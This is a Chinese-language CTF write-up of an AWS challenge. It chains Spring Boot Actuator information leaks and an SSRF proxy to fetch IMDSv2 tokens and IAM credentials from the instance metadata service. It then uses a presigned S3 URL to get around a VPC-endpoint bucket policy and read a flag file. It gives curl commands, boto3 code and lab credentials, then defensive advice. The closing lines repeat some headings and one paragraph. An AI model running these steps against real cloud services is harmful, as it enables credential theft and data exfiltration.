AWS 安全渗透：Spring Boot Actuator 漏洞利用与 S3 数据泄露实战<\/h1>

1. 背景与目标<\/h2>

在一次针对 AWS 环境的渗透测试中，我们发现了一个 Spring Boot Actuator 应用，其端点存在信息泄露漏洞。最终目标是获取存储在 S3 存储桶中的敏感数据（flag）。<\/p>

初始访问点：<\/p>

https:\/\/ctf:88sPVWyC2P3p@challenge01.cloud-champions.com
<\/code><\/pre>
2. 信息收集与漏洞发现<\/h2>
2.1 Actuator 端点枚举<\/h3>
通过访问 \/actuator<\/code> 端点发现多个信息泄露点：<\/p>
# 检查应用状态<\/span>
<\/span><\/span>curl -k "https:\/\/ctf:88sPVWyC2P3p@challenge01.cloud-champions.com"<\/span>
<\/span><\/span>
<\/span><\/span># 访问环境变量端点<\/span>
<\/span><\/span>curl -k "https:\/\/ctf:88sPVWyC2P3p@challenge01.cloud-champions.com\/actuator\/env"<\/span>
<\/span><\/span><\/code><\/pre>在环境信息中发现关键数据：<\/p>

S3 存储桶地址：https:\/\/challenge01-470f711.s3.amazonaws.com\/<\/code><\/li>
EC2 元数据服务相关配置<\/li>
<\/ul>
2.2 路由映射分析<\/h3>
访问 \/actuator\/mappings<\/code> 发现存在代理接口：<\/p>
GET \/proxy?url={url}
<\/span><\/span><\/code><\/pre>此接口存在 SSRF（服务器端请求伪造）漏洞，可用于内部网络探测。<\/p>
3. SSRF 攻击与 IMDSv2 绕过<\/h2>
3.1 IMDSv2 安全机制<\/h3>
AWS 的实例元数据服务 v2 版本需要以下访问流程：<\/p>

首先向 http:\/\/169.254.169.254\/latest\/api\/token<\/code> 发送 PUT 请求<\/li>
获取临时 token（需设置 TTL 头）<\/li>
使用该 token 访问其他元数据端点<\/li>
<\/ol>
3.2 获取元数据访问令牌<\/h3>
# 获取 IMDSv2 token<\/span>
<\/span><\/span>curl -k -X PUT \
<\/span><\/span><\/span><\/span>  "https:\/\/ctf:88sPVWyC2P3p@challenge01.cloud-champions.com\/proxy?url=http:\/\/169.254.169.254\/latest\/api\/token"<\/span> \
<\/span><\/span><\/span><\/span>  -H "X-aws-ec2-metadata-token-ttl-seconds: 3600"<\/span>
<\/span><\/span><\/code><\/pre>3.3 获取实例元数据<\/h3>
使用获取的 token 访问元数据：<\/p>
# 获取 IAM 角色信息<\/span>
<\/span><\/span>curl -k \
<\/span><\/span><\/span><\/span>  "https:\/\/ctf:88sPVWyC2P3p@challenge01.cloud-champions.com\/proxy?url=http:\/\/169.254.169.254\/latest\/meta-data\/iam\/security-credentials\/"<\/span> \
<\/span><\/span><\/span><\/span>  -H "X-aws-ec2-metadata-token: <上面获取的token>"<\/span>
<\/span><\/span>
<\/span><\/span># 获取临时凭证<\/span>
<\/span><\/span>curl -k \
<\/span><\/span><\/span><\/span>  "https:\/\/ctf:88sPVWyC2P3p@challenge01.cloud-champions.com\/proxy?url=http:\/\/169.254.169.254\/latest\/meta-data\/iam\/security-credentials\/<角色名称>"<\/span> \
<\/span><\/span><\/span><\/span>  -H "X-aws-ec2-metadata-token: <token>"<\/span>
<\/span><\/span><\/code><\/pre>4. AWS 凭证配置与权限分析<\/h2>
4.1 配置 AWS CLI<\/h3>
将获取的临时凭证配置到本地：<\/p>
aws configure set aws_access_key_id <AccessKeyId>
<\/span><\/span>aws configure set aws_secret_access_key <SecretAccessKey>
<\/span><\/span>aws configure set aws_session_token <Token>
<\/span><\/span><\/code><\/pre>4.2 权限枚举<\/h3>
发现权限受限，仅能执行部分 STS 和 DynamoDB 操作：<\/p>
# 测试可用服务<\/span>
<\/span><\/span>aws sts get-caller-identity
<\/span><\/span>aws dynamodb list-tables
<\/span><\/span><\/code><\/pre>5. 绕过 VPC Endpoint 限制<\/h2>
5.1 策略分析<\/h3>
S3 存储桶策略检查 aws:SourceVpce<\/code> 条件，要求请求必须来自特定 VPC Endpoint（vpce-0dfd8b6aa1642a057）。<\/p>
5.2 预签名 URL 技术<\/h3>
生成预签名 URL 绕过端点限制：<\/p>
import<\/span> boto3
<\/span><\/span>from<\/span> urllib.parse import<\/span> quote
<\/span><\/span>
<\/span><\/span># 使用获取的凭证创建 S3 客户端<\/span>
<\/span><\/span>s3 =<\/span> boto3.<\/span>client(
<\/span><\/span>    's3'<\/span>,
<\/span><\/span>    aws_access_key_id=<\/span>'ACCESS_KEY'<\/span>,
<\/span><\/span>    aws_secret_access_key=<\/span>'SECRET_KEY'<\/span>,
<\/span><\/span>    aws_session_token=<\/span>'SESSION_TOKEN'<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span># 生成预签名 URL（需要对特殊字符进行 URL 编码）<\/span>
<\/span><\/span>presigned_url =<\/span> s3.<\/span>generate_presigned_url(
<\/span><\/span>    'get_object'<\/span>,
<\/span><\/span>    Params=<\/span>{'Bucket'<\/span>: 'challenge01-470f711'<\/span>, 'Key'<\/span>: 'private\/flag.txt'<\/span>},
<\/span><\/span>    ExpiresIn=<\/span>3600<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span># URL 编码<\/span>
<\/span><\/span>encoded_url =<\/span> quote(presigned_url, safe=<\/span>''<\/span>)
<\/span><\/span><\/code><\/pre>5.3 通过代理接口访问<\/h3>
curl -k \
<\/span><\/span><\/span><\/span>  "https:\/\/ctf:88sPVWyC2P3p@challenge01.cloud-champions.com\/proxy?url=<\/span>${<\/span>encoded_url}<\/span>"<\/span>
<\/span><\/span><\/code><\/pre>6. 关键知识点总结<\/h2>
6.1 Spring Boot Actuator 安全<\/h3>

Actuator 端点可能泄露敏感信息（env、mappings、heapdump 等）<\/li>
应禁用不必要的端点或实施访问控制<\/li>
<\/ul>
6.2 IMDSv2 安全机制<\/h3>

需要 PUT 请求获取 token<\/li>
比 IMDSv1 更安全，防止简单的 SSRF 攻击<\/li>
但仍可通过能够发送头部信息的 SSRF 漏洞绕过<\/li>
<\/ul>
6.3 VPC Endpoint 限制绕过<\/h3>

预签名 URL 允许临时授权访问 S3 资源<\/li>
不检查请求源，仅验证签名有效性<\/li>
需要正确处理 URL 编码<\/li>
<\/ul>
6.4 AWS 权限边界<\/h3>

即使获取临时凭证，也可能受到策略限制<\/li>
需要仔细分析可用权限和绕过方法<\/li>
<\/ul>
7. 防御建议<\/h2>


保护 Actuator 端点<\/strong>：<\/p>

实施身份验证和授权<\/li>
禁用生产环境中不必要的端点<\/li>
<\/ul>
<\/li>

加固 IMDS<\/strong>：<\/p>

使用 IMDSv2 并设置跳数限制<\/li>
使用 IAM 策略限制元数据访问<\/li>
<\/ul>
<\/li>

S3 存储桶安全<\/strong>：<\/p>

避免使用仅依赖 VPC Endpoint 的策略<\/li>
结合多种条件（如源IP、IAM角色等）<\/li>
<\/ul>
<\/li>

网络隔离<\/strong>：<\/p>

限制实例的出站互联网访问<\/li>
使用安全组和网络 ACL 加强控制<\/li>
<\/ul>
<\/li>
<\/ol>
8. 参考资源<\/h2>

AWS IMDSv2 文档：https:\/\/docs.aws.amazon.com\/zh_cn\/AWSEC2\/latest\/UserGuide\/instancedata-data-retrieval.html<\/li>
S3 预签名 URL：https:\/\/docs.aws.amazon.com\/zh_cn\/AmazonS3\/latest\/userguide\/ShareObjectPreSignedURL.html<\/li>
Spring Boot Actuator 安全：https:\/\/spring.io\/guides\/gs\/actuator-service\/<\/li>
<\/ul>
通过本案例，我们展示了如何利用常见的配置错误和安全漏洞，从信息泄露到最终获取敏感数据的完整攻击链。这对于防御方理解如何加固 AWS 环境具有重要意义。<\/p>

AWS 安全渗透：Spring Boot Actuator 漏洞利用与 S3 数据泄露实战<\/h1>

2. 信息收集与漏洞发现<\/h2>

3. SSRF 攻击与 IMDSv2 绕过<\/h2>

4. AWS 凭证配置与权限分析<\/h2>

5. 绕过 VPC Endpoint 限制<\/h2>

5.1 策略分析<\/h3> S3 存储桶策略检查 aws:SourceVpce<\/code> 条件，要求请求必须来自特定 VPC Endpoint（vpce-0dfd8b6aa1642a057）。<\/p>

6. 关键知识点总结<\/h2>

5.1 策略分析<\/h3>
S3 存储桶策略检查 `aws:SourceVpce<\/code> 条件，要求请求必须来自特定 VPC Endpoint（vpce-0dfd8b6aa1642a057）。<\/p>`